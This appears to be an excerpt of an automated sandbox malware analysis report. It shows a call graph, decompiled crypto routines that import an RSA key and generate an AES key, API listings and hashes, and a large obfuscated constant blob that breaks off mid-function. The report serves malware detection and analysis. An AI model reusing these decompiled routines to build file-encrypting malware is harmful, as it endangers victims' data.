CloseServiceHandle 3428->3429 3430 40f18f 3428->3430 3429->3430 3431 40f149 3430->3431 3432 401503 memset 3431->3432 3433 40f15e GetModuleFileNameW 3432->3433 3433->3006 3435 401a52 GetProcessHeap 3434->3435 3436 40f27c 3435->3436 3439 40f190 lstrlenW 3436->3439 3440 40f1b4 3439->3440 3441 40fc67 3442 40fcd4 3441->3442 3445 40fc78 3441->3445 3443 40fc90 WaitForSingleObject 3443->3445 3445->3442 3445->3443 3448 40192a VirtualFree 3445->3448 3449 401532 GetProcessHeap HeapFree 3445->3449 3447 40fcaf CloseHandle 3447->3445 3448->3447 3449->3445 3450 40ff28 IsProcessorFeaturePresent 3451 40ff4e 3450->3451 3452 405a5d 3457 404d56 _memset 3452->3457 3453 405a6b 3454 404e04 memset 3454->3457 3455 404e76 memset 3455->3457 3456 404f66 memset memset memset 3456->3457 3457->3453 3457->3454 3457->3455 3457->3456 3458 40533d memset 3457->3458 3458->3457 3459 40257d GetProcessHeap HeapFree

                  Executed Functions

                  Function 00401F75, Relevance: 7.6, APIs: 5, Instructions: 50encryptionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 121 401f75-401f96 CryptAcquireContextW 122 401ff3-401ffa 121->122 123 401f98-401fbc CryptDecodeObjectEx 121->123 124 401fe6-401fed CryptReleaseContext 123->124 125 401fbe-401fe4 CryptImportKey LocalFree 123->125 124->122 125->122 125->124
                  C-Code - Quality: 50%
                  			E00401F75(void* __ecx) {
				BYTE* _v8;
				int _v12;
				void* _t6;
				void* _t10;
				void* _t15;
				void* _t18;
				int _t19;

				_t19 = 0; // executed
				_t6 =  *0x41305c(0x416510, 0, 0, 0x18, 0xf0000040, _t15, _t18, __ecx, __ecx); // executed
				if(_t6 != 0) {
					_t10 =  *0x4136f0(0x10001, 0x13,  &E00412870, 0x6a, 0x8000, 0,  &_v8,  &_v12); // executed
					if(_t10 == 0) {
						L3:
						CryptReleaseContext( *0x416510, 0);
					} else {
						_t19 = CryptImportKey( *0x416510, _v8, _v12, 0, 0, 0x416514);
						LocalFree(_v8);
						if(_t19 == 0) {
							goto L3;
						}
					}
				}
				return _t19;
			}










                  0x00401f8c
                  0x00401f8e
                  0x00401f96
                  0x00401fb4
                  0x00401fbc
                  0x00401fe6
                  0x00401fed
                  0x00401fbe
                  0x00401fda
                  0x00401fdc
                  0x00401fe4
                  0x00000000
                  0x00000000
                  0x00401fe4
                  0x00401fbc
                  0x00401ffa

                  APIs
                  • CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?), ref: 00401FB4
                  • CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  • CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireDecodeFreeImportLocalObjectRelease
                  • String ID:
                  • API String ID: 900315931-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 1.37%

                  Function 00401FFC, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00401F75: CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                    • Part of subcall function 00401F75: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?), ref: 00401FB4
                    • Part of subcall function 00401F75: CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                    • Part of subcall function 00401F75: LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                    • Part of subcall function 00401F75: CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,00416518,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,0041651C,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402044
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402058
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402064
                  • CryptReleaseContext.ADVAPI32(00000000,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402072
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateDecodeFreeHashImportLocalObject
                  • String ID:
                  • API String ID: 2826826091-0
                  • Opcode ID: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction ID: b801e2a3a967f12315dba04296e97bd271bf4fd4bc32c7350b1888b7b3c01b6c
                  • Opcode Fuzzy Hash: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction Fuzzy Hash: B7F0BD703942057AEA212B31FD0AF963A63BB4470AF158435B611E40F8DFA6D651DE1C
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 00401F75, Relevance: 3.0, APIs: 2, Instructions: 50encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FB4
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDecodeFreeLocalObject
                  • String ID:
                  • API String ID: 4033104587-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 3.32%

                  Function 004076C6, Relevance: 39.0, APIs: 1, Strings: 21, Instructions: 495libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				char _v1888;
				struct HINSTANCE__* _t474;

				_v1888 = 0xa41c4ed0;
				_v1884 = 0x1a33c848;
				_v1880 = 0xf78674dd;
				_v1876 = 0x4d35aed;
				_v1872 = 0x5597c7b0;
				_v1868 = 0xb0ef52b0;
				_v1864 = 0x9b5bf2a7;
				_v1860 = 0xbf81a217;
				_v1856 = 0x3adcb09b;
				_v1852 = 0xe8ac849c;
				_v1848 = 0x57b96c20;
				_v1844 = 0xcd9f7235;
				_v1840 = 0xf420170d;
				_v1836 = 0x14cdf27a;
				_v1832 = 0xfd5eb0fb;
				_v1828 = 0x39318b65;
				_v1824 = 0x65d03115;
				_v1820 = 0x95260aff;
				_v1816 = 0x2e67c28e;
				_v1812 = 0xa1f4a8f4;
				_v1808 = 0xc812f1ab;
				_v1804 = 0xd934dc9c;
				_v1800 = 0xa4e6685;
				_v1796 = 0xfe213c23;
				_v1792 = 0x43c6d29;
				_v1788 = 0xcf12bcb8;
				_v1784 = 0x9f98cc3;
				_v1780 = 0xa1b2d167;
				_v1776 = 0x7fad3c40;
				_v1772 = 0xa80d3c34;
				_v1768 = 0xc8f714d7;
				_v1764 = 0x671d7785;
				_v1760 = 0x4a0ac7c8;
				_v1756 = 0x21c03928;
				_v1752 = 0x4555c0d0;
				_v1748 = 0x9834af68;
				_v1744 = 0xc6d9895d;
				_v1740 = 0xda921464;
				_v1736 = 0x6b089d64;
				_v1732 = 0xfec570b;
				_v1728 = 0xc3626a82;
				_v1724 = 0xd34a14be;
				_v1720 = 0xb7eabcaf;
				_v1716 = 0x281b3387;
				_v1712 = 0xcabf350d;
				_v1708 = 0x207d4223;
				_v1704 = 0xbc0cb804;
				_v1700 = 0xdefac10b;
				_v1696 = 0x679df176;
				_v1692 = 0x6390c0b9;
				_v1688 = 0x817bdef2;
				_v1684 = 0xcb119739;
				_v1680 = 0xd62a3fcf;
				_v1676 = 0x5b6539ee;
				_v1672 = 0x2ebc383e;
				_v1668 = 0xf6595eaa;
				_v1664 = 0xe1fa3158;
				_v1660 = 0xd81c642d;
				_v1656 = 0x5b3ff5b2;
				_v1652 = 0x25dcb5f4;
				_v1648 = 0xb74a4541;
				_v1644 = 0x65280c6a;
				_v1640 = 0x507410e2;
				_v1636 = 0x162eb7ae;
				_v1632 = 0x983fe17e;
				_v1628 = 0x1dce09e5;
				_v1624 = 0x20a01932;
				_v1620 = 0xf8c2ec13;
				_v1616 = 0xd03324ad;
				_v1612 = 0xdda4a81a;
				_v1608 = 0xefe7666e;
				_v1604 = 0x3499fe41;
				_v1600 = 0xfef05481;
				_v1596 = 0x4379be19;
				_v1592 = 0xac2a8a8c;
				_v1588 = 0xaa65ea73;
				_v1584 = 0x780f71c2;
				_v1580 = 0xbc7e1592;
				_v1576 = 0xb46dbbf2;
				_v1572 = 0x7f4481aa;
				_v1568 = 0x4c400fc5;
				_v1564 = 0xd0e27c84;
				_v1560 = 0xa0e4f48d;
				_v1556 = 0x608f4f65;
				_v1552 = 0x81e08196;
				_v1548 = 0x12e25f1;
				_v1544 = 0x108b753a;
				_v1540 = 0x734d6144;
				_v1536 = 0x2099d367;
				_v1532 = 0x4af859b5;
				_v1528 = 0x64274aa4;
				_v1524 = 0xd77c3180;
				_v1520 = 0xd07c56cd;
				_v1516 = 0x63b940a8;
				_v1512 = 0xdefbc07f;
				_v1508 = 0x1ed0b183;
				_v1504 = 0x946279a2;
				_v1500 = 0x1b4e182;
				_v1496 = 0xbd9e9d5e;
				_v1492 = 0xf895b090;
				_v1488 = 0x83ef7189;
				_v1484 = 0xdb6fdda0;
				_v1480 = 0xc43f2288;
				_v1476 = 0xfa2ee974;
				_v1472 = 0xad630715;
				_v1468 = 0x6e3f94ea;
				_v1464 = 0xc210224a;
				_v1460 = 0x5e42620a;
				_v1456 = 0xbdc03864;
				_v1452 = 0xfa898059;
				_v1448 = 0x5b223206;
				_v1444 = 0xe6ee380f;
				_v1440 = 0xe9c024a5;
				_v1436 = 0x795a214e;
				_v1432 = 0xf661e49b;
				_v1428 = 0x5d53c5b6;
				_v1424 = 0xe92e65b3;
				_v1420 = 0xe7f485b4;
				_v1416 = 0xe34b82e0;
				_v1412 = 0xaac6e570;
				_v1408 = 0xd3519085;
				_v1404 = 0x9d031edf;
				_v1400 = 0x16517768;
				_v1396 = 0x6b60337c;
				_v1392 = 0x87f162f5;
				_v1388 = 0x30b72081;
				_v1384 = 0xaf9664d7;
				_v1380 = 0xd1c1388f;
				_v1376 = 0xbaeca29b;
				_v1372 = 0x2614ddd9;
				_v1368 = 0xfd4ce0b1;
				_v1364 = 0x5c9c68b7;
				_v1360 = 0x2676eff1;
				_v1356 = 0x3d50e3a3;
				_v1352 = 0x53c809b1;
				_v1348 = 0x2d212e3b;
				_v1344 = 0x84a1010a;
				_v1340 = 0xafe995ff;
				_v1336 = 0x624ecd4e;
				_v1332 = 0xa0b9de9d;
				_v1328 = 0xf70d11ba;
				_v1324 = 0xe13ac65e;
				_v1320 = 0x94330fb1;
				_v1316 = 0x4ba9883c;
				_v1312 = 0xf9b4aa94;
				_v1308 = 0x1528153;
				_v1304 = 0xab11f915;
				_v1300 = 0xf65a3f7d;
				_v1296 = 0xf416523f;
				_v1292 = 0x622e2452;
				_v1288 = 0xe7dd6fea;
				_v1284 = 0xc53292c3;
				_v1280 = 0x341cfd;
				_v1276 = 0x1bf5cfa4;
				_v1272 = 0x3d6d8fc5;
				_v1268 = 0x882e2a5d;
				_v1264 = 0xf4dab66;
				_v1260 = 0x879777e1;
				_v1256 = 0x4235fa33;
				_v1252 = 0xf7412f63;
				_v1248 = 0x744366b8;
				_v1244 = 0x5d79780f;
				_v1240 = 0x33df1776;
				_v1236 = 0xa6b205d3;
				_v1232 = 0x7f6a7839;
				_v1228 = 0x671dbdce;
				_v1224 = 0xedb53a4e;
				_v1220 = 0x7885bf0f;
				_v1216 = 0x5d5e08dc;
				_v1212 = 0xe0da0cb9;
				_v1208 = 0x72626c3b;
				_v1204 = 0xf7523beb;
				_v1200 = 0xd3cbf7c0;
				_v1196 = 0xf397c375;
				_v1192 = 0xe8e0e8b8;
				_v1188 = 0xda2713ea;
				_v1184 = 0x61e812b;
				_v1180 = 0x1f5e76ae;
				_v1176 = 0xfcc0fd26;
				_v1172 = 0xa4f96784;
				_v1168 = 0xdfc74366;
				_v1164 = 0x4770325;
				_v1160 = 0xfcfb039;
				_v1156 = 0xbb5cd5be;
				_v1152 = 0x835bb17f;
				_v1148 = 0x45f03008;
				_v1144 = 0x8157471b;
				_v1140 = 0x92daa034;
				_v1136 = 0xc4415ba2;
				_v1132 = 0x1b6c5a77;
				_v1128 = 0x7e366518;
				_v1124 = 0x83ab0c1d;
				_v1120 = 0x397b67c4;
				_v1116 = 0xbf8a7d;
				_v1112 = 0x2e52b5be;
				_v1108 = 0x4c915e05;
				_v1104 = 0x3753c1d6;
				_v1100 = 0x95d39f06;
				_v1096 = 0x3d258823;
				_v1092 = 0x3608b8f8;
				_v1088 = 0xb4fbe8a7;
				_v1084 = 0x4c3e8f06;
				_v1080 = 0xe8794991;
				_v1076 = 0xdccaeb41;
				_v1072 = 0x9e236e45;
				_v1068 = 0xc17af71c;
				_v1064 = 0x4e7519a6;
				_v1060 = 0xc27014cc;
				_v1056 = 0x4d83d065;
				_v1052 = 0x6af34f37;
				_v1048 = 0xcd08d804;
				_v1044 = 0x3d730bc7;
				_v1040 = 0x21e8c57d;
				_v1036 = 0x317420d4;
				_v1032 = 0x6ebcf6dd;
				_v1028 = 0x7247c452;
				_v1024 = 0x690e32a5;
				_v1020 = 0x265b9d09;
				_v1016 = 0xef460e82;
				_v1012 = 0xbd38bc0;
				_v1008 = 0xce8b0c3b;
				_v1004 = 0x87b18560;
				_v1000 = 0x923ada08;
				_v996 = 0x7954f0df;
				_v992 = 0x59d4296d;
				_v988 = 0x598866b0;
				_v984 = 0x5ebed584;
				_v980 = 0x75f303ed;
				_v976 = 0x4bd185df;
				_v972 = 0x90668e75;
				_v968 = 0xef0ec6ee;
				_v964 = 0xfb160c3c;
				_v960 = 0xdddf860c;
				_v956 = 0xe3ec7c97;
				_v952 = 0xd84fe87a;
				_v948 = 0x4eebf6de;
				_v944 = 0x6598361e;
				_v940 = 0x2d4f37a9;
				_v936 = 0x20c189e8;
				_v932 = 0x1da649ac;
				_v928 = 0xbb2d17b0;
				_v924 = 0x7365b2a6;
				_v920 = 0x748039dd;
				_v916 = 0x40abf8ad;
				_v912 = 0xc2230aa3;
				_v908 = 0xddc9542f;
				_v904 = 0xd5cbbac;
				_v900 = 0x44de193b;
				_v896 = 0xe51fd5ad;
				_v892 = 0xf9739bdf;
				_v888 = 0xf511941f;
				_v884 = 0xbb4c8f97;
				_v880 = 0x71f29f4a;
				_v876 = 0xf93e7335;
				_v872 = 0xb3d5a235;
				_v868 = 0x8bf5639b;
				_v864 = 0xb678715c;
				_v860 = 0x1681d985;
				_v856 = 0xce6e3dde;
				_v852 = 0x5962f64c;
				_v848 = 0x1b0fea51;
				_v844 = 0xf304da7f;
				_v840 = 0x60dd60fc;
				_v836 = 0x4894e820;
				_v832 = 0xd4c5e951;
				_v828 = 0xbc0c6801;
				_v824 = 0x1b410e8d;
				_v820 = 0x9d4beae1;
				_v816 = 0xb4470101;
				_v812 = 0xefc6595c;
				_v808 = 0x1942297a;
				_v804 = 0x452f53c1;
				_v800 = 0x60736a8a;
				_v796 = 0x1cb5c8c2;
				_v792 = 0xa3b92496;
				_v788 = 0x3604e2c0;
				_v784 = 0x7d04dd0b;
				_v780 = 0xf93943b2;
				_v776 = 0xa34c9da0;
				_v772 = 0x16093c22;
				_v768 = 0x6230157f;
				_v764 = 0xf80a9182;
				_v760 = 0x9d202d62;
